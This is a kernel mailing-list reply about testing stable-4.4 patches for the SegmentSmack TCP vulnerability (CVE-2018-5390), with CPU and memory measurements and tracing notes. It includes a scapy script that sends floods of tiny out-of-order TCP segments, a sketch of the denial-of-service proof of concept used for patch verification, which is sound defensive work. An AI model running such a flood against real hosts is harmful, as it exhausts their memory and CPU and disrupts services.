Date:   Thu, 16 Aug 2018 18:06:16 +0200
From:   Michal Kubecek <mkubecek@...e.cz>
To:     Greg KH <gregkh@...ux-foundation.org>
Cc:     maowenan <maowenan@...wei.com>, dwmw2@...radead.org,
        netdev@...r.kernel.org, eric.dumazet@...il.com,
        edumazet@...gle.com, davem@...emloft.net, ycheng@...gle.com,
        jdw@...zon.de, stable@...r.kernel.org, Takashi Iwai <tiwai@...e.de>
Subject: Re: [PATCH stable 4.4 0/9] fix SegmentSmack in stable branch
 (CVE-2018-5390)

On Thu, Aug 16, 2018 at 05:24:09PM +0200, Greg KH wrote:
> On Thu, Aug 16, 2018 at 02:33:56PM +0200, Michal Kubecek wrote:
> > 
> > Anyway, even at this rate, I only get ~10% of one core (Intel E5-2697).
> > 
> > What I can see, though, is that with current stable 4.4 code, modified
> > testcase which sends something like
> > 
> >   2:3, 3:4, ..., 3001:3002, 3003:3004, 3004:3005, ... 6001:6002, ...
> > 
> > I quickly eat 6 MB of memory for receive queue of one socket while
> > earlier 4.4 kernels only take 200-300 KB. I didn't test latest 4.4 with
> > Takashi's follow-up yet but I'm pretty sure it will help while
> > preserving nice performance when using the original segmentsmack
> > testcase (with increased packet ratio).
> 
> Ok, for now I've applied Takashi's fix to the 4.4 stable queue and will
> push out a new 4.4-rc later tonight.  Can everyone standardize on that
> and test and let me know if it does, or does not, fix the reported
> issues?

I did repeat the tests with Takashi's fix and the CPU utilization is
similar to what we have now, i.e. 3-5% at 10K pkt/s. I could still
saturate one CPU somewhere around 50K pkt/s, but that already requires
2.75 MB/s (22 Mb/s) of throughput. (My previous tests with Mao Wenan's
changes in fact ran at lower speeds, as the change from 128 to 1024
would need to be made in two places.)
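
For reference, the numbers add up: 2.75 MB/s at 50K pkt/s is 55 bytes
per packet, which matches a 1-byte segment plus Ethernet, IP and TCP
headers. And in case anyone wants to reproduce the modified testcase
quoted above, here is a rough sketch of what I mean. This is only an
approximation with scapy, not the original PoC; the target address,
ports and sequence base are placeholders:

  #!/usr/bin/env python
  # Rough approximation of the modified testcase quoted above:
  # 1-byte out-of-order TCP segments (2:3, 3:4, ...) with one byte
  # skipped every 3000 segments, so no contiguous range grows past
  # the ~4 KB collapse threshold. All connection parameters are
  # placeholders; a real run needs an established flow with a
  # matching 4-tuple and sequence numbers.
  from scapy.all import IP, TCP, send

  TARGET = "192.0.2.1"        # placeholder destination
  SPORT, DPORT = 40000, 5001  # placeholder ports
  SEQ0 = 1000000              # placeholder initial sequence number

  seq = 2                     # leave byte 1 as a permanent hole
  for i in range(6000):
      if i and i % 3000 == 0:
          seq += 1            # gap: ..., 3001:3002, 3003:3004, ...
      send(IP(dst=TARGET) /
           TCP(sport=SPORT, dport=DPORT, flags="A", seq=SEQ0 + seq) /
           b"X", verbose=False)
      seq += 1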

Where Takashi's patch does help is that, unlike the current stable 4.4
code, it does not prevent collapsing of ranges of adjacent segments
with total length shorter than ~4 KB. This took more time to verify: it
cannot be checked by watching the socket memory consumption with ss, as
tcp_collapse_ofo_queue() isn't called until we reach the limits. So I
needed to trace when and how tcp_collapse() is called, with both the
current stable 4.4 code and the code with Takashi's fix.
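
The tracing itself does not need anything fancy; a minimal sketch of
one way to do it, with a dynamic kprobe through the standard
kprobe_events interface (the probe group name is arbitrary, and tracefs
is assumed to be at the usual debugfs path; run as root):

  # Trace tcp_collapse() calls via a dynamic kprobe.
  TRACEFS = "/sys/kernel/debug/tracing"

  with open(TRACEFS + "/kprobe_events", "a") as f:
      f.write("p:segprobe/tcp_collapse tcp_collapse\n")
  with open(TRACEFS + "/events/segprobe/tcp_collapse/enable", "w") as f:
      f.write("1\n")

  # ... run the testcase, then read the recorded hits:
  with open(TRACEFS + "/trace") as f:
      print(f.read())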
  
> If not, we can go from there and evaluate this much larger patch
> series.  But let's try the simple thing first.

At high packet rates (say 30K pkt/s and more), we can still saturate
the CPU. This is also mentioned in the announcement, with the claim
that a switch to an rbtree-based queue would be necessary to fully
address it. My tests seem to confirm that, but I'm still not sure it is
worth backporting something that intrusive into stable 4.4.
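
Roughly speaking, the rbtree helps because the linear ofo queue has to
be scanned whenever the stack looks for a segment's place or collapses
the queue, so per-packet work grows with queue length and the total is
quadratic, while a tree bounds each lookup logarithmically. Purely
illustrative numbers:

  # Illustrative only: total node visits for inserting N tiny segments
  # into a linear ofo queue (scanned on each insert) vs. a balanced
  # tree.
  import math
  N = 3000  # segments before the first gap, as in the testcase above
  linear = N * (N + 1) // 2                              # O(N^2) total
  rbtree = sum(math.ceil(math.log2(k + 1)) for k in range(1, N + 1))
  print(linear, rbtree)  # ~4.5 million vs. ~32 thousand visits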

Michal Kubecek
